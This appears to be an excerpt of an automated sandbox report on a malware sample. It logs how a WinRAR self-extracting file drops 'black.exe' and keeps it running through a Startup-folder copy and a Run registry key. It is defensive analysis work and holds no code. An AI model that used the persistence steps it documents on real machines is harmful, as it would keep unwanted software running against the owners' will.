Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Y5kEUsYDFr.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Y5kEUsYDFr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Y5kEUsYDFr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Y5kEUsYDFr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Y5kEUsYDFr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Y5kEUsYDFr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Y5kEUsYDFr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Y5kEUsYDFr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Y5kEUsYDFr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: Y5kEUsYDFr.exe
Source: Y5kEUsYDFr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Y5kEUsYDFr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Y5kEUsYDFr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Y5kEUsYDFr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Y5kEUsYDFr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: black.exe.0.drStatic PE information: 0x921DD1B1 [Sat Sep 7 00:09:21 2047 UTC]
Source: initial sampleStatic PE information: section where entry point is pointing to: .%?T
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_7010812Jump to behavior
Source: Y5kEUsYDFr.exeStatic PE information: section name: .didat
Source: Y5kEUsYDFr.exeStatic PE information: section name: _RDATA
Source: black.exe.0.drStatic PE information: section name: .|]Y
Source: black.exe.0.drStatic PE information: section name: .z~z
Source: black.exe.0.drStatic PE information: section name: .%?T
Source: black.exe.1.drStatic PE information: section name: .|]Y
Source: black.exe.1.drStatic PE information: section name: .z~z
Source: black.exe.1.drStatic PE information: section name: .%?T
Source: black.exe0.1.drStatic PE information: section name: .|]Y
Source: black.exe0.1.drStatic PE information: section name: .z~z
Source: black.exe0.1.drStatic PE information: section name: .%?T
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CAA05156 push rsi; retf 0_2_00007FF6CAA05157
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CAA05166 push rsi; retf 0_2_00007FF6CAA05167
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A81F0 pushfd ; retn 2812h1_2_023A8220
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_046C0DC1 pushad ; retf 7_2_046C0DD9
Source: black.exe.0.drStatic PE information: section name: .%?T entropy: 7.730962970796143
Source: black.exe.1.drStatic PE information: section name: .%?T entropy: 7.730962970796143
Source: black.exe0.1.drStatic PE information: section name: .%?T entropy: 7.730962970796143
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeFile created: C:\Users\user\AppData\Roaming\black.exeJump to dropped file
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exeJump to dropped file

Boot Survival

barindex
Drops PE files to the startup folder
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run blackJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run blackJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\black.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
